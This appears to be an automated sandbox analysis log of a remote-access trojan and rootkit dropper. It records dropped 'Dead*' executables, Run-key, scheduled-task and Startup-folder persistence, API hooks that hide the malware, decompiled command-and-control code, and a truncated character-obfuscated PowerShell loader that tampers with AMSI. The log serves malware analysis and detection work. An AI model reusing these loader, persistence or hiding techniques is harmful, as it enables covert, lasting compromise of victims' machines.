Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: version.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Deadsvchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Deadsvchost.lnk.1.dr LNK file: ..\..\..\..\..\..\..\..\Public\Deadsvchost.exe
Source: DeadROOTkit.lnk.2.dr LNK file: ..\..\..\..\..\..\Local\DeadROOTkit.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: mIURiU8n2P.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: mIURiU8n2P.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000017.00000000.1840558344.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2941691166.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000017.00000002.2940183395.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1840509505.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000017.00000000.1840584622.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2942503144.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: DeadXClient.exe.0.dr, Messages.cs .Net Code: Memory
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.0.dr, Messages.cs .Net Code: Memory
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, Messages.cs .Net Code: Memory
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: Deadsvchost.exe.1.dr, Messages.cs .Net Code: Memory
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: DeadROOTkit.exe.2.dr, Messages.cs .Net Code: Memory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Objec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f
Source: C:\Users\Public\DeadXClient.exe Code function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B80885D pushad ; ret 2_2_00007FFD9B8088EB
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8088A8 pushad ; ret 2_2_00007FFD9B8088EB
Source: C:\Users\Public\DeadROOTkit.exe Code function: 2_2_00007FFD9B8000AD pushad ; iretd 2_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EDBB5 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7E63FB push ebx; retf 000Ah 4_2_00007FFD9B7E641A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EDC35 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7EDC40 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B7E00AD pushad ; iretd 4_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9BA651EB push ecx; iretd 4_2_00007FFD9BA651EC
Source: C:\Windows\System32\dllhost.exe Code function: 6_3_000002E86A0786ED push rcx; retf 003Fh 6_3_000002E86A0786EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B6BD2A5 pushad ; iretd 7_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7D00AD pushad ; iretd 7_2_00007FFD9B7D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8A2316 push 8B485F94h; iretd 7_2_00007FFD9B8A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8A26C9 pushad ; retf 7_2_00007FFD9B8A26E9
Source: C:\Windows\System32\winlogon.exe Code function: 11_3_00000225DC6286ED push rcx; retf 003Fh 11_3_00000225DC6286EE
Source: C:\Windows\System32\lsass.exe Code function: 12_3_00000202C0AC86ED push rcx; retf 003Fh 12_3_00000202C0AC86EE
Source: C:\Users\Public\Deadsvchost.exe Code function: 13_2_00007FFD9B8000AD pushad ; iretd 13_2_00007FFD9B8000C1
Source: C:\Windows\System32\svchost.exe Code function: 14_3_000002A6612E86ED push rcx; retf 003Fh 14_3_000002A6612E86EE
Source: C:\Windows\System32\dwm.exe Code function: 16_3_000002BAAF1F86ED push rcx; retf 003Fh 16_3_000002BAAF1F86EE
Source: C:\Windows\System32\svchost.exe Code function: 17_3_0000026A879A86ED push rcx; retf 003Fh 17_3_0000026A879A86EE
Source: C:\Windows\System32\svchost.exe Code function: 19_3_00000179537886ED push rcx; retf 003Fh 19_3_00000179537886EE
Source: C:\Windows\System32\svchost.exe Code function: 20_3_000002295D5486ED push rcx; retf 003Fh 20_3_000002295D5486EE

Persistence and Installation Behavior

Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadROOTkit.exe
Source: C:\Users\Public\DeadROOTkit.exe File created: C:\Users\user\AppData\Local\DeadROOTkit.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadXClient.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadCodeRootKit.exe
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\Public\Deadsvchost.exe

Boot Survival

Source: C:\Users\Public\DeadXClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deadsvchost
Source: C:\Users\Public\DeadROOTkit.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkit
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadROOTkit.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadXClient.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe File created: C:\Users\Public\DeadCodeRootKit.exe
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\Public\Deadsvchost.exe
Source: C:\Users\Public\DeadXClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadXClient.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\DeadROOTkit
Source: C:\Users\Public\DeadROOTkit.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadROOTkit.lnk

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\Public\DeadCodeRootKit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE Deadstager
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\DeadXClient.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\DeadROOTkit.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
